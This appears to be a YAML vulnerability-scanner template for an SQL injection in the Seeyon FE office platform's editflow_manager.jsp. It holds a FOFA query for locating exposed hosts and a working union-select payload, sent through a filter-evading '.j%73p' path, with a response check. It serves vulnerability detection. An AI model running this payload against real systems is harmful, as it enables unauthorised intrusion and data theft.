product: 致远FE
vName: 致远互联FE协作办公平台 editflow_manager.jsp SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 致远互联FE协作办公平台是一款为企业提供全方位协同办公解决方案的产品。它集成了多个功能模块，旨在帮助企业实现高效的团队协作、信息共享和文档管理。致远互联FE协作办公平台editflow_manager存在sql注入漏洞，攻击者可以获得敏感信息。
version: ''
note: ''
search:
  FOFA: app="致远互联-FE"
protocol: http
link: https://blog.csdn.net/luochen2436/article/details/135020685
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /sysform/003/editflow_manager.j%73p
      data: option=2&GUID=-1' union select @@version-- -
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - Microsoft SQL
            logic: and